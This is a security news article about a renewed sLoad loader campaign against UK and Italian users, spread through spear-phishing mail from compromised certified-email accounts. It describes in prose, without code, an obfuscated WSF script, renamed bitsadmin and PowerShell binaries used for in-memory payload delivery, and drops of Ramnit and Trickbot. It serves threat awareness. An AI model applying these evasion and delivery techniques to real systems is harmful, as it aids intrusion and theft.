sLoad (aka Starslord loader) is active again and this time it is targeting users in the U.K. and Italy. It has been active since 2018 and had several updates lately. The malware creator is regularly changing the first stage script, while the main module largely remains the same.
What was discovered?
According to Minerva Labs, sLoad infections started coming from Italian endpoints since the beginning of this year. Last week, a payments-themed sLoad campaign was spreading with compromised Posta Elettronica Certificata (PEC), which refers to certified emails.
This time the malware’s authors have taken a unique approach, where instead of using an executable or a malicious document to infiltrate machines, they use scripts that are native to Windows OS.
These native scripts are VBS and PowerShell, which are being used as an initial foothold. The attackers are fooling recipients into executing scripts via spear-phishing emails.
The attackers have used an obfuscated WSF script that decodes a set of malicious commands. Once executed, it will stealthily download and then run a remote payload in memory.
The script renames genuine Windows binaries bitsadmin[.]exe and Powershell[.]exe as an evasion technique. The former downloads a PowerShell script and the latter loads it to memory then starts its execution.
Final payloads and scripts
The final payload of sLoad varies, however, it drops Ramnit and Trickbot banking trojans. Both of the malware are dangerous and may even lead to ransomware attacks.
Initial reports of this malware disclosed that it uses a rogue LNK file (a Windows shortcut) to download a PowerShell script, which will ultimately download and execute sLoad.
Later editions used obfuscated VBS/WSF scripts, which are often mutated to bypass AV detection. The initial script employed in attacks is designed to bypass security tools such as EDRs.
sLoad is a dangerous malware and its recent activities lead to serious concerns. It is being continually developed and updated by its authors and has become more advanced in recent years. Therefore, it is important that organizations take this threat more seriously and apply adequate security measures.